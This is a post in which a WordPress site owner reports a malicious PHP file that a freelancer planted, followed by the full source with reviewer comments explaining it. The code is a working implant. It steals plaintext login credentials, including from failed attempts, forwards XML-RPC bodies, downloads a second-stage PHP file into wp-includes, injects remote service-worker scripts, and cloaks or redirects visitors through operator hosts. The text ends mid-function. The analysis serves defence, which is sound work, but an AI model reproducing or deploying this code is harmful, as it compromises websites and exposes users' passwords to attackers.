I was working with a freelancer from Upwork and noticed they had added this script, named `.default`, to my config directory. They were hired only to make CSS style changes to Elementor, so there is no legitimate reason for a file like this, and it looks malicious:
<?php
// NOTE(review): this file is a WordPress implant, not configuration. Read top to bottom it
//   - fetches an operator IP allowlist and exempts those visitors from everything below,
//   - patches/drops PHP files under wp-includes/ when magic URL suffixes are requested,
//   - swallows xmlrpc.php POST bodies and forwards them to ww.seniors-dating.org,
//   - serves a service-worker stub that loads scripts from picmedia.biz / redads.biz,
//   - proxies or redirects visitors through fsst.seniors-dating.org / chipotle.buzz and
//     injects the upstream response into wp_head,
//   - clears WordPress cookies once per visitor, then sends every successful and failed
//     login (username, plaintext password, role, IP) to ww.seniors-dating.org.
// Remediation, as far as this file alone shows: remove it and whatever includes it, remove
// wp-includes/class-wp-http-netfilter.php, wp-includes/abcsss.php and wp-includes/header.php
// if present, rotate every WordPress password, and assume any password typed into the site
// while this was live is known to the operator.
//
// Tell browsers and intermediaries not to store this response. The rest of the file serves
// different content per visitor (keyed on IP, User-Agent and Referer), so a cached copy
// would hand the cloaked variant to the wrong audience — presumably the reason for this.
header('Cache-Control: private, max-age=0, no-cache');
/**
 * Resolve the visitor's "real" IP for the checks further down.
 *
 * Walks the listed $_SERVER keys in order — Cloudflare, proxy and X-Forwarded-* headers
 * first, REMOTE_ADDR last — splits comma-separated values, and returns the first entry
 * that filter_var() accepts as a public (non-private, non-reserved) IP. Falls off the end
 * (implicit null) if nothing qualifies.
 *
 * NOTE(review): every key except REMOTE_ADDR is a request header the client controls, so a
 * visitor picks the IP this function reports simply by sending e.g. `X-Forwarded-For: <ip>`.
 * That matters because the result is compared against the operator allowlist
 * (ip.admins.txt) and the crawler-IP regexes below, and is exfiltrated as `user_ip`
 * alongside captured logins.
 */
if (!function_exists('getUserIP')) {
function getUserIP() {
// Header precedence is fixed by this array order; REMOTE_ADDR is consulted last.
foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) === true) {
// X-Forwarded-For style headers may hold a comma-separated chain; take the first public one.
foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
}
}
/**
 * Fetch $url over curl and cache the body on disk under a core-looking file name.
 *
 * $url         remote text to fetch (only ever called with the operator's ip.admins.txt).
 * $skip_cache  when TRUE, always fetch and never write the cache file.
 *
 * The cache file is ABSPATH.WPINC.'/class-wp-http-netfilter.php', i.e. inside
 * wp-includes/ with a name styled after core's class-wp-http-*.php transports. As far as I
 * know no such core file exists — treat its presence as an indicator of compromise.
 *
 * $cachetime is 10 seconds despite the "one week" comment; the real one-week value is
 * commented out, so the allowlist is effectively re-fetched every 10 seconds.
 *
 * Returns the fetched body when a fetch happened, otherwise the cached body. When the fetch
 * fails (curl returns FALSE) the stale cache is NOT used as a fallback — FALSE is returned.
 */
if (!function_exists('cacheUrl')) {
function cacheUrl($url, $skip_cache = FALSE) {
$cachetime = 10; //one week
// $cachetime = 60 * 60 * 24 * 7; //one week
$file = ABSPATH.WPINC.
'/class-wp-http-netfilter.php';
$mtime = 0;
if (file_exists($file)) {
$mtime = filemtime($file);
}
$filetimemod = $mtime + $cachetime;
// Refetch when the cache is missing/older than $cachetime, or when caching is bypassed.
if ($filetimemod < time() OR $skip_cache) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
// Spoofed desktop Chrome UA so the fetch looks like a browser to the upstream host.
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
CURLOPT_FOLLOWLOCATION => TRUE,
CURLOPT_MAXREDIRS => 5,
CURLOPT_CONNECTTIMEOUT => 30,
CURLOPT_TIMEOUT => 60,
));
$data = curl_exec($ch);
curl_close($ch);
// Only a truthy body is written; an empty or failed response leaves the old file in place.
if ($data AND!$skip_cache) {
file_put_contents($file, $data);
}
} else {
$data = file_get_contents($file);
}
return $data;
}
}
// ---------------------------------------------------------------------------
// Main dispatch — runs on every request that loads this file.
// ---------------------------------------------------------------------------
// Operator exemption: pull the attacker's IP allowlist (re-fetched every 10 s through
// cacheUrl's tiny cache window) and skip the entire payload when the visitor's IP is
// listed, so the operators never see their own cloaking. getUserIP() trusts
// X-Forwarded-For and friends, so any client that spoofs a listed IP in a header also
// gets the exemption. If getUserIP() yields nothing the needle is empty: PHP 8 reports a
// match at offset 0 (payload skipped), PHP 7 warns and returns false (payload runs).
$weoboo = cacheUrl('http://ww.seniors-dating.org/lnk/ip.admins.txt');
if (strpos($weoboo, getUserIP()) !== false) {
//ip found
} else {
// Request context shared by every branch below.
// $gbt is only referenced from commented-out code; $id and $uri hold the same value.
$gbt = getUserIP();
$id = $_SERVER['REQUEST_URI'];
$uag = $_SERVER['HTTP_USER_AGENT'];
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
// Pseudo-JSON blob of host / referer / URI. It is sent to the operator's servers as the
// curl Referer header further down, and it is also the haystack for several
// preg_match_all() checks — so a term like "dating", "google" or "css" triggers if it
// appears in the host, the referer OR the request path. (HTTP_REFERER is undefined when
// the browser sends no Referer; the string then just carries an empty value there.)
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
// Magic-URL trigger 1: path ends in "ssss" -> print a marker and keep going.
// Presumably a liveness probe the operator uses to confirm the implant is active.
if (preg_match_all("/ssss$/", $id, $matches) ) {
echo '1112';
}
// Magic-URL trigger 2: path ends in "iiis" -> rewrite wp-includes/header.php in place,
// swapping one opaque token for another, then stop. WordPress core ships no header.php
// under wp-includes/ (themes do), so this is presumably a companion implant being
// re-keyed — TODO inspect and remove that file as well.
if (preg_match_all("/iiis$/", $id, $matches) ) {
$file2Replace = ABSPATH.WPINC.'/header.php';
$oldRep = 'Zgc5c4MXrK42MR4F7ZdaOu3fNFnPMLhU3ySQFu7RvxpYYEcbGgEg4Q==';
$newRep = 'Zgc5c4MXrK42MQsM7IlQPPeZfl3OdrpdmmSLH6uToRkH';
$repContent = file_get_contents($file2Replace);
$repContent = str_replace($oldRep, $newRep, $repContent);
file_put_contents($file2Replace, $repContent);
exit;
}
// XML-RPC interception: for any path ending in xmlrpc.php the raw POST body is read from
// php://input and forwarded verbatim to the operator's api_xmlrpc.php; the request is
// then answered with WordPress's usual "POST only" text and ended, so the real XML-RPC
// endpoint never runs. XML-RPC method calls (mobile apps, Jetpack, etc.) typically carry
// the username and password in that body, so this is credential capture for API clients.
// The upstream response is discarded.
if (preg_match_all("/xmlrpc.php$/", $id, $matches) ) {
if (!empty($_POST))
{
$res = file_get_contents ('php://input') . "\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, 'http://ww.seniors-dating.org/lnk/api_xmlrpc.php');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $res );
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
echo 'XML-RPC server accepts POST requests only.';
exit;
}
// Service-worker loader: two URL patterns answer with a one-line worker script that pulls
// w1s.js from a third-party domain. Registering it lets that remote script run as a
// service worker for this origin (push/ad injection is the usual goal — TODO confirm by
// fetching w1s.js offline). The regex dots are unescaped and the patterns are unanchored
// on the left, so e.g. "...1332Xjs" also matches.
if (preg_match_all("/068f7461.js$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://picmedia.biz/sw/w1s.js\');';
exit;
}
if (preg_match_all("/serviceworker.js$|332.js$|34334$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://redads.biz/sw/w1s.js\');';
//echo $gbt;
exit;
}
// Dropper: path ends in headssr.php -> download sh.txt and save it as
// wp-includes/abcsss.php, a web-reachable PHP file (presumably a web shell or second
// stage — TODO retrieve and inspect offline). Skipped when the file already exists, is
// non-empty and is less than one hour old; otherwise re-fetched. fopen('w+') truncates
// before curl runs, so a failed download leaves an empty file, which then fails the
// filesize() check and is retried on the next hit. No exit here: the request also goes
// through the proxy logic below.
if (preg_match_all("/headssr\.php$/", $id, $matches) ) {
$fileUrl = 'http://ww.seniors-dating.org/lnk/sh.txt';
$saveTo = ABSPATH . WPINC . '/abcsss.php';
if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) {
//
}
else {
$fp = fopen($saveTo, 'w+');
$ch = curl_init($fileUrl);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_exec($ch);
curl_close($ch);
fclose($fp);
}
}
// Unused: $srr is assigned and never read.
$srr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
// Cloaking / traffic hijack. Skipped when the path ends in "ffgg" (presumably an operator
// switch for viewing the clean site) or the UA matches this short, case-sensitive crawler
// list (note "Wordpress" with a lower-case p, which does not match WordPress's own
// "WordPress/x.y" loopback User-Agent).
if (!preg_match_all("/ffgg$/", $id, $matches) ) {
if (!preg_match_all("/BLEXBot|Wordpress|SemrushBot|AhrefsBot|YandexBot|DotBot|MJ12bot|hrankbot|Darwin|spider/", $uag, $matches)) {
// $tr = site host with "www." and every dot removed (example.com -> "examplecom"); it
// becomes a path segment of the upstream URL below. The first branch (drop the first
// label instead) is overridden by the second unless $r contains the literal
// "2r232r22r", so it is effectively dead code.
if (preg_match_all("/dating|senior|singles/", $r, $matches) ) {
$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = preg_replace ('#^[^\.]*#', '', $tr);
$tr = str_replace('.', '', $tr);
}
if (!preg_match_all("/2r232r22r/", $r, $matches) ) {
$tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = str_replace('.', '', $tr);
}
// One curl handle is created here and reused by both proxy sections below, each of which
// closes it. On PHP 8 curl_close() is a no-op so the reuse works; on PHP 7 the second
// section would be operating on a closed resource whenever the first one ran.
$ch = curl_init();
$user_ip = getUserIP();
// Crawler/operator IP regex, used three times below. The dots are unescaped and the
// alternatives are unanchored, so each entry matches loosely (e.g. "216.239..*" matches
// any IP containing 216?239). 66.249.* looks like Googlebot and the 65.55 / 157.55 /
// 207.46 / 40.77 / 131.253 ranges look like Bing/MSN crawlers; the single addresses are
// presumably operator hosts — TODO confirm against WHOIS. "2212.24.105.244" is a typo and
// can never match a dotted quad.
// For non-doorway paths (no /post- or /pgxhtogrzm-), a crawler IP causes supermario() to
// be defined: it fetches a random "sape" link block from the operator and appends it to
// post content. The add_filter() that would hook it is commented out and nothing else
// calls it, so this SEO-spam link injection is currently inert.
if (!preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
//
if (preg_match_all("/213.111.153.189|213.111.166.54|213.111.153.84|213.111.153.197|37.1.217.38|2212.24.105.244|134.19.179.147|213.111.153.197|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
// add_filter( 'the_content', 'supermario', 20 );
function supermario($content){
$ch = curl_init( 'http://fsst.seniors-dating.org/sape/pgxhtogrzm-'.rand(1,64).'-'.rand(1,47767).'-aa/' );
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
$miaLinks = curl_exec ($ch);
curl_close($ch);
return $content . $miaLinks;
}
}
}
// Always (within this branch) add no-cache / noarchive / notranslate meta tags to <head>.
// noarchive presumably keeps search engines from exposing a cached copy of the cloaked
// page. add_action() is called here without the function_exists() guard that the login
// hooks at the bottom of the file use — TODO confirm where this file is included from.
function add_meta_cache() {
echo '<meta http-equiv="Cache-Control" content="no-cache">';
echo '<meta http-equiv="cache-control" content="max-age=0" />';
echo '<meta http-equiv="cache-control" content="no-store" />';
echo '<meta name="google" content="notranslate" />';
echo '<meta name="robots" content="noarchive" />';
}
add_action('wp_head', 'add_meta_cache');
// Doorway pages: paths containing /post- or /pgxhtogrzm-. The upstream URL is set when
// either (a) host/referer/URI mentions google|bing|msn|yahoo AND the IP is NOT a listed
// crawler — a human arriving from a search engine — or (b) the IP IS a listed crawler.
// Both cases fetch the page body from fsst.seniors-dating.org/pirc/<tr>/<path>. Anyone
// else leaves $url_string unset: curl then runs with a null URL, fails, and an empty body
// is echoed.
if (preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) {
if (!preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|109.202.107.20|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
$url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id;
} }
if (preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|134.19.179.147|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
$url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id;
}
// The upstream fetch impersonates the visitor: their User-Agent, the pseudo-JSON $r as the
// Referer, and REMOTE_ADDR (not getUserIP()) in X-Forwarded-For. Response headers are
// kept so the status and Location can be read back.
curl_setopt ($ch, CURLOPT_URL, $url_string);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
// $host/$ref/$uri/$r are recomputed here with the same values as above.
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
curl_setopt($ch, CURLOPT_REFERER, $r);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
$html = curl_exec ($ch);
// Upstream 302 -> the visitor is redirected wherever the operator's server says. If the
// Location header cannot be parsed, $location is undefined and an empty "Location:"
// header is sent.
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
if (preg_match('~Location: (.*)~i', $html, $match)) {
$location = trim($match[1]);
} curl_close($ch);
header('Location: ' . $location);
exit();
} $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($html, 0, $header_size);
$html = substr($html, $header_size);
curl_close($ch);
// Dead assignment within this section: $url_string becomes a "User-Agent: ..." string and
// is not used again here. It is, however, still set when the second proxy section below
// runs for the same request, and becomes that section's URL if its own guards do not
// assign one.
if (isset($_SERVER['HTTP_USER_AGENT']))
$url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
// Content-Type is guessed from the request path so upstream-served css/images/xml/pdf
// render, then the upstream body is written straight to the client. No exit (commented
// out), so WordPress continues and its own output follows the injected body.
if (strstr($id, ".css")){
header('Content-Type: text/css; charset=utf-8');
}
elseif (strstr($id, ".png")){
header('Content-Type: image/png');
}
elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
header('Content-Type: image/jpeg');
}
elseif (strstr($id, ".gif")){
header('Content-Type: image/gif');
}
elseif (strstr($id, ".xml")){
header('Content-Type: application/xml');
}
if(strstr($header, 'pdf'))
header('Content-Type: application/pdf');
echo $html;
// exit;
}
// Everything else (normal page views). The upstream URL is set unless host/referer/URI
// contains one of the static-asset, admin or probe patterns below — "js" and "css" are
// bare substrings, so any host or path containing them is excluded too — or the UA
// matches the long case-insensitive bot list. The IP gate that used to sit inside is
// commented out, so every remaining visitor is routed through chipotle.buzz with the site
// host passed as a parameter.
// if (preg_match_all("/3322233322/", $r, $matches) ) {
if (!preg_match_all("/robots.txt|\.env$|favicon\.ico$|wp-login\.php|\/wp-content\/|\.txt$|js|css|\/wp-admin\/|\.xml$|\/wp-includes\/|well-known\/|=\.\.|wp-cron\.php/", $r, $matches) ) {
if (!preg_match_all("/DELETEORNOTXZ|YanSex|Baidu|Googlebot|Yandexbot|Bing|DeuSu|ltx71|CCBot|pirst|Sogou|zgrab|Nutch|Aport|Ahrefs|urllib|semtix|madbot|Exabot|AdvBot|DotBot|ezooms|statdom|MauiBot|XoviBot|BLEXBot|HTTrack|MJ12bot|Panopta|rogerbot|uCrawler|Netcraft|Moreover|Netcraft|verifying|majestic|solomono|Teleport|Site-Shot|netEstate|Crowsnest|360Spider|MegaIndex|DataMiner|SemrushBot|PaperLiBot|linkdexbot|SafeDNSBot|Barkrowler|AC-BaiduBot|ZoominfoBot|Baiduspider|DomainTools|YisouSpider|TurnitinBot|domainstats|serpstatbot|blogmuraBot|randomsurfer|Nimbostratus|DomainCrawler|Go-http-client|trendictionbot|SocialSearcher|CRAZYWEBCRAWLER|python-requests|CheckMarkNetwork|NetpeakCheckerBot|DomainSONOCrawler|FlightDeckReportsBot/i", $uag, $matches)) {
//if (preg_match_all("/213.111.153.217|37.1.217.38|213.152.162.104|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $gbt, $matches)) {
//$urlsArr = [
//'http://chipotle.buzz/in/inseq',
//'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/'
//];
//$url_string = $urlsArr[array_rand($urlsArr)];
// $url_string = 'http://chipotle.buzz/in/news/?val1='.$r;
$url_string = 'http://chipotle.buzz/in/news/?val1='.$host;
// $url_string = 'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/';
}
}
// Same impersonated fetch as the doorway section (visitor UA, $r as Referer, REMOTE_ADDR
// as X-Forwarded-For). A 302 from chipotle.buzz is relayed to the visitor as a redirect,
// i.e. the upstream decides per request whether to hijack the visit. This fetch sits
// outside the two guards above, so it runs for every request in this branch; when the
// guards did not set $url_string the handle has a null (or leftover "User-Agent: ...")
// URL, curl_exec fails and the injected body is empty.
curl_setopt ($ch, CURLOPT_URL, $url_string);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
curl_setopt($ch, CURLOPT_REFERER, $r);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
$html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
if (preg_match('~Location: (.*)~i', $html, $match)) {
$location = trim($match[1]);
} curl_close($ch);
header('Location: ' . $location);
exit();
}
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($html, 0, $header_size);
$html = substr($html, $header_size);
curl_close($ch);
// Dead assignment, as in the doorway section above.
if (isset($_SERVER['HTTP_USER_AGENT']))
$url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
// Content-Type guessing as above. Largely moot here: the body is not echoed directly
// (commented out) but injected through a wp_head action, so the visitor receives the
// upstream HTML/script inside <head> of the normal WordPress page.
if (strstr($id, ".css")){
header('Content-Type: text/css; charset=utf-8');
}
elseif (strstr($id, ".png")){
header('Content-Type: image/png');
}
elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
header('Content-Type: image/jpeg');
}
elseif (strstr($id, ".gif")){
header('Content-Type: image/gif');
}
elseif (strstr($id, ".xml")){
header('Content-Type: application/xml');
}
if(strstr($header, 'pdf'))
header('Content-Type: application/pdf');
// echo $html;
// yuhoo() just echoes; the closure below captures $html by value at registration time.
function yuhoo($html) {
echo $html;
}
add_action('wp_head',
function() use ( $html ) {
yuhoo( $html );
}
);
// exit;
}
// }
}
}
//file_put_contents('/tmp/log.txt', getUserIP() . "\n", FILE_APPEND);
/* your code end */
/* weoboo end */
// First-contact logout. If the visitor carries no `_eshoob` marker cookie, set one (7 days,
// path /) and expire every cookie whose name contains "wordpress", "wp_" or "wp-" — which
// covers the WordPress auth, logged-in and settings cookies. Together with the wp_login
// hook below, which records the submitted username and password, this presumably forces a
// fresh login so the credentials can be captured — TODO confirm that reading.
// Note: the deletions pass no domain and only the default path and '/', so cookies that
// WordPress set on narrower paths (e.g. /wp-admin/) are not necessarily cleared.
// Note: if the "ssss" branch above already produced output, these setcookie() calls fail
// because headers have been sent.
if(!isset($_COOKIE['_eshoob'])) {
setcookie('_eshoob', 1, time()+604800, '/');
// unset cookies
if (isset($_SERVER['HTTP_COOKIE'])) {
// Parse the raw Cookie header rather than $_COOKIE so names are matched as sent.
$cookies = explode(';', $_SERVER['HTTP_COOKIE']);
foreach($cookies as $cookie) {
if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) {
$parts = explode('=', $cookie);
$name = trim($parts[0]);
// Expire twice: once on the default path, once on '/'.
setcookie($name, '', time()-1000);
setcookie($name, '', time()-1000, '/');
}
}
}
}
/**
 * Second, identical definition of getUserIP() (same header order, same public-IP filter).
 * The function_exists() guard makes it a no-op here because the copy near the top of the
 * file already won; presumably the two halves of this file (cloaking vs. credential
 * harvesting) were pasted together from separate components.
 */
if (!function_exists('getUserIP')) {
function getUserIP()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)
{
if (array_key_exists($key, $_SERVER) === true)
{
foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip)
{
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false)
{
return $ip;
}
}
}
}
}
}
/**
 * Return the request scheme as the string 'https' or 'http' (despite the name, not a bool).
 *
 * Treats the request as HTTPS if any of REQUEST_SCHEME, HTTPS=on, X-Forwarded-Proto=https,
 * X-Forwarded-SSL=on or SERVER_PORT=443 says so; the two X-Forwarded-* checks are
 * client-supplied headers. Only used below to tag exfiltrated logins with `wp_scheme`.
 */
if (!function_exists('isHttps')) {
function isHttps() {
if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
(!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
(!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
(!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
$server_request_scheme = 'https';
} else {
$server_request_scheme = 'http';
}
return $server_request_scheme;
}
}
/**
 * Credential exfiltration on successful login (hooked to `wp_login` below; the name is
 * chosen to look like debugging code).
 *
 * $user_login, $user  the hook's arguments — both are ignored; the user is looked up again
 *                     from $_POST['log'].
 *
 * Reads the username and the PLAINTEXT password straight from the wp-login.php form fields
 * ($_POST['log'], $_POST['pwd']), tags them with host, URI, scheme, the visitor IP
 * (getUserIP(), header-spoofable) and 'admin'/'user' depending on the administrator role,
 * and POSTs the JSON to ww.seniors-dating.org/lnk/api.php over plain HTTP. The response is
 * discarded. Sends nothing when $_POST['log'] is empty.
 *
 * NOTE(review): when the login did not come through the form (wp_signon() from code, REST,
 * XML-RPC) $_POST['log'] is unset, get_user_by() returns false, `->roles` is read on a
 * bool, and on PHP 8 in_array() then throws a TypeError (argument 2 must be an array) —
 * which would abort that login request. TODO confirm on the affected PHP version.
 */
if (!function_exists('wordpress_api_debug')) {
function wordpress_api_debug( $user_login, $user ){
$wpApiUrl = "http://ww.seniors-dating.org/lnk/api.php";
//
$uuuser = get_user_by('login', $_POST['log']);
if(in_array('administrator', $uuuser->roles)){
$role = 'admin';
}
else{
$role = 'user';
}
//
$verbLogs = array(
'wp_host' => $_SERVER['HTTP_HOST'],
'wp_uri' => $_SERVER['REQUEST_URI'],
'wp_scheme' => isHttps(),
'user_login' => $_POST['log'],
'user_password' => $_POST['pwd'],
'user_ip' => getUserIP(),
'user_role' => $role
);
if (!empty($verbLogs['user_login'])) {
$wpLogData = json_encode($verbLogs);
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
}
}
// Hook the harvester to every successful login. The function_exists() guard suggests the
// author expected this file to sometimes load before wp-includes/plugin.php — if it does,
// the hook is silently never registered on that request. (The wp_head add_action() calls
// earlier in the file carry no such guard.)
if (function_exists('add_action')) {
add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );
}
/**
 * Credential exfiltration on FAILED login (hooked to `wp_login_failed` below).
 *
 * Identical to wordpress_api_debug() except for the endpoint, api_false.php: every
 * rejected attempt — near-miss typos of the real password included — is sent with
 * username, plaintext password, role of the targeted account, host, URI, scheme and IP.
 * Both hook arguments are ignored; the user is looked up from $_POST['log'].
 *
 * NOTE(review): same PHP 8 hazard as the success hook — for an unknown username
 * get_user_by() returns false and in_array() on `->roles` throws a TypeError.
 */
if (!function_exists('wordpress_api_wrongauth_debug')) {
function wordpress_api_wrongauth_debug( $user_login, $user ){
$wpApiUrl = "http://ww.seniors-dating.org/lnk/api_false.php";
//
$uuuser = get_user_by('login', $_POST['log']);
if(in_array('administrator', $uuuser->roles)){
$role = 'admin';
}
else{
$role = 'user';
}
//
$verbLogs = array(
'wp_host' => $_SERVER['HTTP_HOST'],
'wp_uri' => $_SERVER['REQUEST_URI'],
'wp_scheme' => isHttps(),
'user_login' => $_POST['log'],
'user_password' => $_POST['pwd'],
'user_ip' => getUserIP(),
'user_role' => $role
);
if (!empty($verbLogs['user_login'])) {
$wpLogData = json_encode($verbLogs);
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
